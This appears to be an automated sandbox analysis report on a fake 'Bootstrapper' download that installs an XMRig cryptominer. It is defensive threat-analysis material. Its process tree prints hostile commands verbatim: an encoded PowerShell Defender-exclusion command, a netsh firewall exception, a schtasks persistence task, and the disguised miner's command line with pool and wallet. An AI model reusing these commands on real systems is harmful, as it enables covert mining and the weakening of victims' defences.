Resubmissions

10-11-2024 19:49

241110-yjqwdsxjcr 10

10-11-2024 15:11

241110-sk226aymex 10

Analysis

  • max time kernel
    1049s
  • max time network
    1049s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-11-2024 19:49

General

  • Target

    http://uploadnow.io/f/tv6ml4w

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 11 IoCs
  • Unexpected DNS network traffic destination 13 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 21 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 30 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://uploadnow.io/f/tv6ml4w
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff874cb46f8,0x7ff874cb4708,0x7ff874cb4718
      2⤵
        PID:1504
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
        2⤵
          PID:4816
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1644
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
          2⤵
            PID:1684
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
            2⤵
              PID:1940
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
              2⤵
                PID:2928
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
                2⤵
                  PID:1380
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
                  2⤵
                    PID:4644
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
                    2⤵
                      PID:3680
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
                      2⤵
                        PID:232
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
                        2⤵
                          PID:2500
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4316
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
                          2⤵
                            PID:4180
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
                            2⤵
                              PID:5088
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2380 /prefetch:8
                              2⤵
                                PID:3972
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
                                2⤵
                                  PID:4336
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6852 /prefetch:1
                                  2⤵
                                    PID:4392
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7004 /prefetch:1
                                    2⤵
                                      PID:324
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6004 /prefetch:8
                                      2⤵
                                        PID:5196
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
                                        2⤵
                                          PID:5248
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
                                          2⤵
                                            PID:5256
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7040 /prefetch:8
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5468
                                          • C:\Users\Admin\Downloads\Bootstrapper.exe
                                            "C:\Users\Admin\Downloads\Bootstrapper.exe"
                                            2⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of SetWindowsHookEx
                                            PID:5572
                                            • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
                                              3⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of SetWindowsHookEx
                                              PID:5764
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAbABkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAeQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAYQB4ACMAPgA="
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5864
                                              • C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.22.exe
                                                "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.22.exe"
                                                4⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5932
                                                • C:\Windows\SYSTEM32\cmd.exe
                                                  "cmd" /c ipconfig /all
                                                  5⤵
                                                    PID:4872
                                                    • C:\Windows\system32\ipconfig.exe
                                                      ipconfig /all
                                                      6⤵
                                                      • Gathers network information
                                                      PID:5400
                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                    "cmd" /c wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
                                                    5⤵
                                                      PID:5904
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
                                                        6⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5784
                                                    • C:\Windows\System32\msiexec.exe
                                                      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
                                                      5⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5204
                                                    • C:\ProgramData\Solara\Solara.exe
                                                      "C:\ProgramData\Solara\Solara.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1832
                                                  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                                    4⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:6040
                                                    • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                      5⤵
                                                      • Drops startup file
                                                      • Executes dropped EXE
                                                      • Drops autorun.inf file
                                                      • Drops file in System32 directory
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5448
                                                      • C:\Windows\SysWOW64\netsh.exe
                                                        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        • Event Triggered Execution: Netsh Helper DLL
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5684
                                                • C:\Users\Admin\AppData\Local\Temp\services.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\services.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:5816
                                                  • C:\Windows\System32\conhost.exe
                                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services.exe"
                                                    4⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:5212
                                                    • C:\Windows\System32\cmd.exe
                                                      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                      5⤵
                                                        PID:5540
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                          6⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:5556
                                                      • C:\Windows\System32\cmd.exe
                                                        "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                        5⤵
                                                          PID:3756
                                                          • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                            C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:2108
                                                            • C:\Windows\System32\conhost.exe
                                                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                              7⤵
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:4660
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:5996
                                                                • C:\Windows\System32\conhost.exe
                                                                  "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                  9⤵
                                                                    PID:5332
                                                                • C:\Windows\explorer.exe
                                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=48yTML2v9RKUS32RqWHhkBNF339PJYwB1KYnMxcRU76x5sq9oB58iBkQevqBsquoqdA3MAf9CZtu8UK4SqY4ebd1UMsRNEN --pass=ACL01567%98X --cpu-max-threads-hint=10 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=30 --cinit-stealth
                                                                  8⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3356
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,4210781329925827536,966470553851794710,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6604 /prefetch:2
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2164
                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                    1⤵
                                                      PID:1360
                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                      1⤵
                                                        PID:2464
                                                      • C:\Windows\system32\msiexec.exe
                                                        C:\Windows\system32\msiexec.exe /V
                                                        1⤵
                                                        • Blocklisted process makes network request
                                                        • Enumerates connected drives
                                                        • Drops file in Program Files directory
                                                        • Drops file in Windows directory
                                                        • Modifies data under HKEY_USERS
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:112
                                                        • C:\Windows\System32\MsiExec.exe
                                                          C:\Windows\System32\MsiExec.exe -Embedding 8A67F5EF600728D0070793CF2296296A
                                                          2⤵
                                                          • Loads dropped DLL
                                                          PID:4128
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 69E621AF55E95D5131DFDDF7E47CA7E6
                                                          2⤵
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5692
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 6928B1B3A158BBF9D86910EEC91BFDC0 E Global\MSI0000
                                                          2⤵
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          PID:6080
                                                          • C:\Windows\SysWOW64\wevtutil.exe
                                                            "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3964
                                                            • C:\Windows\System32\wevtutil.exe
                                                              "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
                                                              4⤵
                                                                PID:4456

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Config.Msi\e586f42.rbs

                                                          Filesize

                                                          1.0MB

                                                          MD5

                                                          1b6073216b5f83d9c8c0094003246121

                                                          SHA1

                                                          acf5fa79ad5c869c737634ebdc7e4c53ddbea703

                                                          SHA256

                                                          172dff4ce6c9fbc797ecf68edf94e2f9ee6d13bf2f807d5d879da3a1c4806bb5

                                                          SHA512

                                                          b1ec62286229f2c0fba0b435674e0e1f617892b4cb5016c60f6163160367cfa6ecdd5abd3dfec4a590b61b7577761a969f64259899320f7e9052c61f8c2cd381

                                                        • C:\Program Files\nodejs\node_etw_provider.man

                                                          Filesize

                                                          10KB

                                                          MD5

                                                          ff399a53a481c138c6982792a22fe1af

                                                          SHA1

                                                          e40bca9e46b9a9f25d5b158a20d587b9f8e0c62e

                                                          SHA256

                                                          bd99150cdefb046ce58764c963964c440ab8e58bc104cc56dc611a279099178a

                                                          SHA512

                                                          1a25c45d1b371e93099bb1a78456359fb282353a1ed4bab8c7b7ee73eb19025da4e8b9cd938fb42c7d02b56f7ba658c7e73b4bb867b26cb4abd8e7e735124d43

                                                        • C:\Program Files\nodejs\node_etw_provider.man

                                                          Filesize

                                                          8KB

                                                          MD5

                                                          d3bc164e23e694c644e0b1ce3e3f9910

                                                          SHA1

                                                          1849f8b1326111b5d4d93febc2bafb3856e601bb

                                                          SHA256

                                                          1185aaa5af804c6bc6925f5202e68bb2254016509847cd382a015907440d86b4

                                                          SHA512

                                                          91ebff613f4c35c625bb9b450726167fb77b035666ed635acf75ca992c4846d952655a2513b4ecb8ca6f19640d57555f2a4af3538b676c3bd2ea1094c4992854

                                                        • C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md

                                                          Filesize

                                                          818B

                                                          MD5

                                                          2916d8b51a5cc0a350d64389bc07aef6

                                                          SHA1

                                                          c9d5ac416c1dd7945651bee712dbed4d158d09e1

                                                          SHA256

                                                          733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

                                                          SHA512

                                                          508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

                                                        • C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          5ad87d95c13094fa67f25442ff521efd

                                                          SHA1

                                                          01f1438a98e1b796e05a74131e6bb9d66c9e8542

                                                          SHA256

                                                          67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

                                                          SHA512

                                                          7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

                                                        • C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

                                                          Filesize

                                                          754B

                                                          MD5

                                                          d2cf52aa43e18fdc87562d4c1303f46a

                                                          SHA1

                                                          58fb4a65fffb438630351e7cafd322579817e5e1

                                                          SHA256

                                                          45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

                                                          SHA512

                                                          54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

                                                        • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md

                                                          Filesize

                                                          771B

                                                          MD5

                                                          e9dc66f98e5f7ff720bf603fff36ebc5

                                                          SHA1

                                                          f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b

                                                          SHA256

                                                          b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79

                                                          SHA512

                                                          8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

                                                        • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE

                                                          Filesize

                                                          730B

                                                          MD5

                                                          072ac9ab0c4667f8f876becedfe10ee0

                                                          SHA1

                                                          0227492dcdc7fb8de1d14f9d3421c333230cf8fe

                                                          SHA256

                                                          2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

                                                          SHA512

                                                          f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

                                                        • C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          d116a360376e31950428ed26eae9ffd4

                                                          SHA1

                                                          192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

                                                          SHA256

                                                          c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

                                                          SHA512

                                                          5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

                                                        • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

                                                          Filesize

                                                          802B

                                                          MD5

                                                          d7c8fab641cd22d2cd30d2999cc77040

                                                          SHA1

                                                          d293601583b1454ad5415260e4378217d569538e

                                                          SHA256

                                                          04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

                                                          SHA512

                                                          278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

                                                        • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

                                                          Filesize

                                                          16KB

                                                          MD5

                                                          bc0c0eeede037aa152345ab1f9774e92

                                                          SHA1

